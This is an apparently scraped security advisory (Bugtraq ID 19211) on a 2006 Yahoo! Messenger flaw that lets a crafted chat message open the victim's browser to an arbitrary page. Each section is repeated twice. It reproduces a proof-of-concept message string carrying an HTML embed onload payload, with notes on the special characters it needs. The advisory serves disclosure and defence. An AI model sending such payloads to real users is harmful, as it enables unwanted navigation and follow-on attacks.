Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
BID:19211
Info
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
| Bugtraq ID: | 19211 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 28 2006 12:00AM |
| Updated: | Feb 20 2007 08:27PM |
| Credit: | Ivan Ivan is credited with the discovery of this vulnerability. |
| Vulnerable: |
Yahoo! Messenger 7.5 .814 Yahoo! Messenger 7.0 .438 |
| Not Vulnerable: |
Yahoo! Messenger 8.1.0.239 Yahoo! Messenger 8.1.0.209 |
Discussion
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
Yahoo! Messenger is prone to a browser-navigation vulnerability that may permit a remote attacker to open a browser window on the victim user's computer to an arbitrary page.
This issue occurs because the application fails to sanitize malicious messages.
An attacker may be able to exploit this issue to execute a web browser and load an arbitrary web page. This may lead to other attacks.
This issue affects version 7.5.0.814; other versions may also be vulnerable.
Yahoo! Messenger is prone to a browser-navigation vulnerability that may permit a remote attacker to open a browser window on the victim user's computer to an arbitrary page.
This issue occurs because the application fails to sanitize malicious messages.
An attacker may be able to exploit this issue to execute a web browser and load an arbitrary web page. This may lead to other attacks.
This issue affects version 7.5.0.814; other versions may also be vulnerable.
Exploit / POC
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
An attacker can exploit this issue via standard networking tools or possibly by using another client application.
The following examples are sufficient to trigger this issue:
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space.
An attacker can exploit this issue via standard networking tools or possibly by using another client application.
The following examples are sufficient to trigger this issue:
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space.
Solution / Fix
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
Solution:
frisky chris <[email protected]> states that this issue does not affect version 8.1 of Yahoo! Messenger. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
frisky chris <[email protected]> states that this issue does not affect version 8.1 of Yahoo! Messenger. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
References:
References:
- Yahoo! Messenger Homepage (Yahoo!)